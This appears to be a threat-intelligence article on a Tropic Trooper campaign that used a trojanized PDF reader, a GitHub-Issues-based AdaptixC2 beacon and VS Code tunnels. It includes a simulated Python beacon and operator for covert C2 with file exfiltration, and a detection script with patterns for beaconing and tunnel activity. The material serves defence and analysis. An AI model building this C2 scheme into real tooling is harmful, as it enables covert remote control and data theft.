A new cyberattack campaign attributed to the notorious threat group Tropic Trooper has been uncovered, employing sophisticated techniques including a custom beacon listener and Visual Studio (VS) Code tunnels for remote access. This campaign, which began on March 12, 2026, has been targeting individuals in Taiwan, South Korea, and Japan, using military-themed documents as initial lures. The adaptation of open-source tools and developer infrastructure marks a significant evolution in the group’s modus operandi.
The attack chain starts with a trojanized build of the open-source SumatraPDF reader, delivered as an executable whose filename references submarine cooperation between the US, UK, and Australia. When run, it opens a decoy PDF about the AUKUS security partnership so the victim sees what they expected, while in the background it downloads and launches the AdaptixC2 Beacon agent. Because the decoy is a real document and the carrier is a real application, this staged approach keeps the true nature of the intrusion hidden from the victim.
Tropic Trooper’s Evolving Tactics: Custom Beacon and VS Code Tunnels
Researchers at Zscaler ThreatLabz analyzed the campaign end to end and cite strong evidence linking it to Tropic Trooper, also tracked as Earth Centaur and Pirate Panda. The attribution rests on a loader resembling the previously documented TOSHIS loader and on other known Tropic Trooper tooling found on the staging server, including a Cobalt Strike Beacon carrying a watermark associated with the group.
A key development in this campaign is Tropic Trooper's move away from its earlier reliance on Cobalt Strike Beacon or Merlin Mythic agents. The group has instead adopted the open-source AdaptixC2 framework and extended it with a custom beacon listener. Leaning on publicly available offensive tooling blurs attribution and lowers the cost of reusing the same kit across operations, a trend seen among advanced persistent threat (APT) groups in the Asia-Pacific region.
Perhaps the most novel element of this attack is the use of Visual Studio (VS) Code tunnels to obtain remote access to compromised systems the actor deemed "interesting." After the initial compromise, observed commands included creating scheduled tasks for persistence, network reconnaissance with standard tools such as `arp` and `net view`, and direct interactive access to victim machines through VS Code tunnels. Abusing a widely trusted developer tool makes detection hard: the tunnel is brokered by Microsoft-hosted infrastructure over TLS, so it looks like ordinary developer traffic and is rarely inspected or blocked, and the operator reaches it from anywhere by signing in with the GitHub or Microsoft account the tunnel was registered to, with no inbound port opened on the victim.
How the AdaptixC2 Beacon Uses GitHub as Its C2
The most inventive piece of the campaign is the AdaptixC2 beacon listener's use of GitHub as its command-and-control (C2) platform. Instead of a traditional attacker-controlled server, the beacon talks to a GitHub repository: it receives tasking through GitHub Issues and returns results as file contents uploaded back to the same repository.
This workflow runs through a repository created under a throwaway GitHub account, so at the network level the beacon's traffic is hard to tell apart from a developer using the GitHub API. The beacon first looks up its own external IP address via ipinfo.io, since GitHub-based communication does not tell it this. It then announces itself by POSTing an encrypted check-in to issue #1 of the repository; the check-in carries an RC4 session key derived from a random seed, and that key protects the rest of the session.
The beacon then polls the repository's open issues for pending tasks, dispatching on patterns in issue titles such as "upload" or "fileupload." Encrypted results go back as Base64-encoded file uploads to the same repository. All C2 traffic is RC4-encrypted, and the researchers observed that check-ins posted to GitHub were deleted within 10 seconds, so the session key is gone before anyone looking at the repository can retrieve it. The caveat for defenders is that the key is only gone from GitHub: the POST body is still recoverable from an endpoint agent that logs outbound request bodies, from a TLS-inspecting proxy, or from the beacon process's memory, and without one of those a captured session cannot be decrypted.
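The following Python model, added here and not taken from the Zscaler report or from AdaptixC2 itself, plays both sides of the workflow described above against an in-memory stand-in for one GitHub repository's Issues and Contents APIs. The page confirms only RC4, a check-in POSTed to issue #1, a session key derived from a random seed, task dispatch on "upload"/"fileupload" issue titles, Base64-encoded file uploads for results, and check-ins deleted seconds after posting. Everything else is an assumption for the example: the static key that protects the seed in transit, the SHA-256 derivation of the session key, the `<kind>:<beacon id>` title convention, the `results/` upload path, the canned command output, and the stubbed ipinfo.io answer.

```python
import base64
import hashlib
import json
import os

def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA keystream XOR); the same call encrypts and decrypts."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

class FakeRepo:
    """In-memory stand-in for one GitHub repo's Issues and Contents APIs (constructed)."""
    def __init__(self):
        self.issues, self.files, self._next = {}, {}, 1
        self.create_issue("check-ins")  # issue #1 is where new beacons announce themselves
    def create_issue(self, title, body=""):
        n, self._next = self._next, self._next + 1
        self.issues[n] = {"title": title, "body": body, "state": "open", "comments": []}
        return n
    def open_issues(self):
        return [(n, i) for n, i in self.issues.items() if i["state"] == "open"]
    def close_issue(self, n): self.issues[n]["state"] = "closed"
    def add_comment(self, n, body): self.issues[n]["comments"].append(body)
    def delete_comment(self, n, body): self.issues[n]["comments"].remove(body)
    def put_file(self, path, b64): self.files[path] = b64
    def get_file(self, path): return self.files[path]

# ASSUMPTION: a key baked into the beacon protects the seed in transit; the page says only
# that the session key is "derived from a random seed", not how the operator learns it.
STATIC_KEY = b"assumed-pre-shared-key"
def session_key(seed: bytes) -> bytes:
    return hashlib.sha256(seed).digest()[:16]  # ASSUMPTION: the derivation scheme

class Beacon:
    def __init__(self, repo, external_ip):
        self.repo, self.ip, self.post = repo, external_ip, None
        self.seed = os.urandom(16)
        self.key = session_key(self.seed)
        self.id = hashlib.sha1(self.seed).hexdigest()[:8]
        # Canned output and a fake file system stand in for real execution (constructed).
        self.shell = {"whoami": "corp\\svc_user"}
        self.fs = {"C:\\Users\\svc_user\\notes.txt": b"meeting notes"}
    def check_in(self):
        """Seed + host metadata, RC4 under the static key, Base64, posted to issue #1."""
        meta = json.dumps({"id": self.id, "ip": self.ip}).encode()
        self.post = base64.b64encode(rc4(STATIC_KEY, self.seed + meta)).decode()
        self.repo.add_comment(1, self.post)
    def erase_check_in(self):
        self.repo.delete_comment(1, self.post)  # observed: the post is removed within seconds
    def poll(self):
        """Open issues titled '<kind>:<beacon id>' are tasks; answer each as a file upload."""
        for n, issue in self.repo.open_issues():
            kind, _, target = issue["title"].partition(":")
            if target != self.id:
                continue
            arg = rc4(self.key, base64.b64decode(issue["body"])).decode()
            if kind == "upload":          # run a command, return its output
                result = self.shell.get(arg, f"'{arg}' is not recognized").encode()
            elif kind == "fileupload":    # exfiltrate a file
                result = self.fs.get(arg, b"")
            else:
                continue
            blob = base64.b64encode(rc4(self.key, result)).decode()
            self.repo.put_file(f"results/{self.id}/{n}.txt", blob)
            self.repo.close_issue(n)

class Operator:
    def __init__(self, repo):
        self.repo, self.sessions = repo, {}
    def read_check_ins(self):
        """Recover each beacon's seed from issue #1 and derive the same session key."""
        for c in self.repo.issues[1]["comments"]:
            plain = rc4(STATIC_KEY, base64.b64decode(c))
            seed, meta = plain[:16], json.loads(plain[16:])
            self.sessions[meta["id"]] = session_key(seed)
        return list(self.sessions)
    def task(self, beacon_id, kind, arg):
        body = base64.b64encode(rc4(self.sessions[beacon_id], arg.encode())).decode()
        return self.repo.create_issue(f"{kind}:{beacon_id}", body)
    def collect(self, beacon_id, n):
        blob = base64.b64decode(self.repo.get_file(f"results/{beacon_id}/{n}.txt"))
        return rc4(self.sessions[beacon_id], blob)

def run_exchange():
    """One round trip: check-in, key recovery, check-in erased, two tasks, results collected."""
    repo = FakeRepo()
    beacon = Beacon(repo, external_ip="203.0.113.7")  # ipinfo.io lookup stubbed with TEST-NET
    beacon.check_in()
    op = Operator(repo)
    (bid,) = op.read_check_ins()
    beacon.erase_check_in()  # from here on, issue #1 holds no key material for an observer
    t1 = op.task(bid, "upload", "whoami")
    t2 = op.task(bid, "fileupload", "C:\\Users\\svc_user\\notes.txt")
    beacon.poll()
    return repo, op.collect(bid, t1).decode(), op.collect(bid, t2)
```

The point the model makes concrete is the last sentence of the paragraph above: after `erase_check_in()` the repository still holds the tasking issues and the uploaded result files, but the seed that would let anyone derive the session key is gone, so a defender who only has the repository contents cannot decrypt either side of the exchange.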
Organizations can reduce their exposure to this kind of campaign with a few concrete controls. Block, or at least alert on, GitHub API traffic from endpoints that have no development role, in particular requests to the issues and contents endpoints of repositories under unknown user accounts. Enforce application allowlisting so that a trojanized binary posing as a legitimate reader cannot run. Monitor scheduled task creation (Windows Security event ID 4698, or the Task Scheduler operational log) and treat tasks with service-like names, especially ones that launch from user-writable paths, as suspect.
Restrict or at least audit VS Code tunnels in the corporate environment, since the feature hands out remote access without any inbound firewall rule; `code tunnel` on a command line, or a tunnel service registration, on a machine that is not a developer workstation deserves a look. Lookups to ipinfo.io and similar external-IP services from internal systems are a cheap beaconing indicator to hunt on. Finally, email and file gateway controls should catch ZIP archives carrying executables disguised as documents.
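As an added example that is not part of the article or the Zscaler report, the Python below runs the hunting ideas from the two paragraphs above over a handful of constructed telemetry records: proxy requests, scheduled-task creations, and process command lines. The pipe-delimited log format, the developer-host allowlist, the dev-tunnel hostnames, and the "service-like name from a user-writable path" heuristic are assumptions for the example; swap in whatever your proxy and EDR actually emit.

```python
import re
from collections import Counter

# Constructed sample telemetry, one record per line: kind|timestamp|host|fields...
#   proxy   -> destination|path|method
#   task    -> task name|command   (as you would extract from Windows event 4698)
#   process -> full command line
SAMPLE_LOGS = r"""
proxy|2026-03-14T09:12:03Z|WS-01|ipinfo.io|/json|GET
proxy|2026-03-14T09:12:05Z|WS-01|api.github.com|/repos/someuser/notes/issues/1/comments|POST
proxy|2026-03-14T09:13:10Z|DEV-LAPTOP-07|api.github.com|/repos/corp/app/pulls|GET
proxy|2026-03-14T09:40:51Z|WS-01|global.rel.tunnels.api.visualstudio.com|/api/v1/tunnels|POST
task|2026-03-14T09:15:22Z|WS-01|\Microsoft\Windows\UpdateService|C:\Users\svc_user\AppData\Roaming\svc\updater.exe
task|2026-03-14T22:00:00Z|WS-02|\Backup\Nightly|C:\Program Files\Backup\backup.exe
process|2026-03-14T09:40:49Z|WS-01|"C:\Users\svc_user\AppData\Local\Programs\Microsoft VS Code\bin\code.exe" tunnel
""".strip().splitlines()

DEV_HOSTS = {"DEV-LAPTOP-07"}  # ASSUMPTION: hosts where GitHub API use is expected
# Issue and contents endpoints are the two the campaign's C2 relies on.
GITHUB_C2_PATH = re.compile(r"^/repos/[^/]+/[^/]+/(issues|contents)(/|$)")
# ASSUMPTION: dev-tunnel broker hostnames; confirm against what your proxy logs show.
TUNNEL_HOST = re.compile(r"(\.devtunnels\.ms|tunnels\.api\.visualstudio\.com)$")
SERVICE_LIKE = re.compile(r"(Microsoft|Windows|Update|Service|Defender)", re.I)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)
CODE_TUNNEL = re.compile(r"code(\.exe)?\"?\s+tunnel\b", re.I)

def parse(line):
    kind, ts, host, *fields = line.split("|")
    return kind, ts, host, fields

def check(kind, host, fields):
    """Return a finding string, or None if the record is benign under these rules."""
    if kind == "proxy":
        dest, path, method = fields
        if dest == "ipinfo.io":
            return "external IP lookup via ipinfo.io (beacon pre-check)"
        if TUNNEL_HOST.search(dest):
            return f"VS Code dev tunnel endpoint contacted ({dest})"
        if dest == "api.github.com" and host not in DEV_HOSTS and GITHUB_C2_PATH.match(path):
            return f"GitHub issues/contents API from non-developer host: {method} {path}"
    elif kind == "task":
        name, cmd = fields
        if SERVICE_LIKE.search(name) and USER_WRITABLE.search(cmd):
            return f"service-like scheduled task {name} runs from a user-writable path"
    elif kind == "process":
        if CODE_TUNNEL.search(fields[0]):
            return "VS Code tunnel started from the command line"
    return None

def hunt(lines):
    """Apply every rule to every record; returns (host, timestamp, finding) tuples."""
    findings = []
    for line in lines:
        kind, ts, host, fields = parse(line)
        hit = check(kind, host, fields)
        if hit:
            findings.append((host, ts, hit))
    return findings

def triage(findings, threshold=3):
    """Hosts that trip several independent rules go to the top of the queue."""
    per_host = Counter(host for host, _, _ in findings)
    return sorted(h for h, n in per_host.items() if n >= threshold)
```

None of these rules is a conviction on its own: developers legitimately hit the GitHub API and start tunnels, and plenty of software looks up its public IP. The value is in `triage`, which surfaces a host that shows the ipinfo.io lookup, the issues-API POST, a service-like task from AppData, and a tunnel start within the same half hour, which is exactly the sequence the post-compromise activity above describes.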
The ongoing evolution of threat actor tactics, as demonstrated by Tropic Trooper’s creative use of developer tools and platforms, underscores the need for continuous adaptation in cybersecurity defenses. Organizations must remain vigilant and proactive in identifying and mitigating emergent threats, particularly those leveraging the broad trust placed in legitimate software and services.
